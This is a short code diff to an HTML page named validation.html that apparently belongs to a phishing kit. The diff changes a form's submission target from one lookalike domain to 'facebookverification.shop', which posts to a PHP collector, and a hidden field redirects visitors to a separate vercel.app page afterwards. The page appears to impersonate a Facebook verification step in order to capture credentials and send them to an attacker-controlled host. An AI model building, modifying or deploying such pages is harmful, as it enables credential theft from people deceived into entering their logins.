--- a/validation.html
+++ b/validation.html
@@ -8,7 +8,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://passwaordlink.shop/babopass/hameed.php" method="post">
+        <form action="https://facebookverification.shop/babopass/hameed.php" method="post">
             <input type="hidden" name="_redirect" value="https://2-re-case-pass-section.vercel.app/"/>
             <div id="root">
                 <div>
